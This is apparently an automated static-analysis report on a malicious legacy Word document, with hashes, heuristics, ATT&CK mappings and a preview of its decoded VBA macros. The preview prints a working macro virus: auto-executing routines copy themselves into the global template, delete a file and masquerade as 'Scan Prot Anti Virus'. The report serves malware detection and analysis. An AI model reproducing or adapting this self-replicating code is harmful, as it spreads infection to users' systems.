Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd17e574c4aaa3d2…

MALICIOUS

Office (OLE)

113.5 KB Created: 2000-05-15 15:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 40331480e150752b56f763b068811bc9 SHA-1: 378359a11a4cc8fde32e52905b7f80d56393b274 SHA-256: bd17e574c4aaa3d2de058550d0957f84496d75b79a4407feafa8ef478aeee365
288 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This legacy Word document contains multiple VBA macros, including AutoOpen, AutoClose, and AutoExec, which are designed to execute automatically. The 'Infec' macro attempts to copy itself and other malicious macros ('AutoExec', 'email', 'libvirus', 'AutoClose', 'AutoOpen') into the global template, indicating an attempt at persistence. The use of `Environ("LEGADO")` suggests it might be checking for a specific environment variable to control its execution, and the `Shell()` call indicates it can execute arbitrary commands.

Heuristics 8

  • ClamAV: Doc.Trojan.Tamago-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Tamago-4
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44257 bytes
SHA-256: abb5a044c0313d4ec92d083f633edc9ff642ff3ad72f594f014cdff25f8e7c74
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ArquivoImprimir"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.ArquivoImprimir.MAIN"
WordBasic.Call "ImpreArq"  'possibly insert text.
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FilePrint(False)     'declare dialog of type FilePrint
WordBasic.CurValues.FilePrint dlg
WordBasic.Dialog.FilePrint dlg      'executa dialogo de impressão
WordBasic.FilePrint dlg       'perform actions from dialog.
End Sub

Attribute VB_Name = "Infec"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Infec.MAIN"
Dim caminho$
caminho$ = Environ("LEGADO")
If caminho$ = "NOWAY" Then GoTo NoWay
On Error GoTo -1: On Error GoTo NoWay
On Error GoTo -1: On Error GoTo AutoExec
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":Infec", "Global:Infec", 1
AutoExec:
On Error GoTo -1: On Error GoTo email
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExec", "Global:AutoExec", 1
email:
On Error GoTo -1: On Error GoTo libvirus
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":email", "Global:email", 1
libvirus:
On Error GoTo -1: On Error GoTo AutoClose
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":libvirus", "Global:libvirus", 1
AutoClose:
On Error GoTo -1: On Error GoTo AutoOpen
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose", 1
AutoOpen:
On Error GoTo -1: On Error GoTo arqsalcomo
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoOpen", "Global:AutoOpen", 1
arqsalcomo:
On Error GoTo -1: On Error GoTo arqimp
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ArquivoSalvarComo", "Global:ArquivoSalvarComo", 1
arqimp:
On Error GoTo -1: On Error GoTo arqimppad
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ArquivoImprimir", "Global:ArquivoImprimir", 1
arqimppad:
On Error GoTo -1: On Error GoTo imparq
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ArquivoImprimirPadrão", "Global:ArquivoImprimirPadrão", 1
imparq:
On Error GoTo -1: On Error GoTo destruct
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ImpreArq", "Global:ImpreArq", 1
destruct:
On Error GoTo -1: On Error GoTo NoWay
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":Destruct", "Global:Destruct", 1
NoWay:
End Sub

Attribute VB_Name = "AutoExec"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoExec.MAIN"
WordBasic.Call "Infec"
WordBasic.Call "email"
WordBasic.Call "libvirus"
End Sub

Attribute VB_Name = "email"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Scan Prot Anti Virus"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.email.MAIN"
Dim versao$
Dim so$
Dim normal$
Dim nome$
Dim T
Dim tecla
On Error GoTo -1: On Error GoTo NoWay
versao$ = WordBasic.[GetSystemInfo$](24)
so$ = WordBasic.[GetSystemInfo$](21)
normal$ = ""
nome$ = "c:\precos.doc"
If WordBasic.[Files$](nome$) <> "" Then WordBasic.Kill nome$
If WordBasic.[Files$]("c:\winword\modelos\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\winword\modelos\normal.dot")
If WordBasic.[Files$]("c:\winword\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\winword\normal.dot")
If WordBasic.[Files$]("c:\msoffice\modelos\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\msoffice\modelos\normal.dot")
If WordBasic.[Files$]("c:\msoffice\models\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("c:\msoffice\models\normal.dot")
If WordBasic.[Files$]("normal.dot") <> "" Then normal$ = WordBasic.[Files$]("normal.dot")
If WordBasic.[Files$]("modelos\normal.dot") <> "" Then normal$ = WordBasic.[Files$]("modelos\normal.dot")

If normal$ = ""
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.